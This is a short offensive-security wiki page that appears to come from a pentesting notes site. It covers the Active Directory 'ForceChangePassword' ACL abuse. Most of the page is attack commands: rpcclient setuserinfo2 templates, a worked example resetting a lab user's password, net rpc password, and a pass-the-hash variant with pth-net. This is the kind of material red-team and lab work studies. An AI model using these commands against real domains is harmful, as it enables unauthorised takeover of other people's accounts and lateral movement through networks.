ForcePasswordChange

This abuse can be carried out when controlling an object that has a GenericAll, AllExtendedRights or User-Force-Change-Password over the target user.

ForceChangePasswordThe Hacker Recipes

Bloodhound Analysis

Commands

# rpcclient 
rpcclient -U $DOMAIN/$ControlledUser $DomainController
rpcclient $> setuserinfo2 $TargetUser 23 $NewPassword

Kali> rpcclient -U lab.trusted.vl/rsmith labdc.lab.trusted.vl
rpcclient $> setuserinfo2 ewalters 23 Password0-


# With net and cleartext credentials (will be prompted)
net rpc password $TargetUser -U $DOMAIN/$ControlledUser -S $DomainController

# With Pass-the-Hash
pth-net rpc password $TargetUser -U $DOMAIN/$ControlledUser%ffffffffffffffffffffffffffffffff:$NThash -S $DomainController

PreviousACL Abuse NextACL Abuse and Shadow Credential

Last updated 8 months ago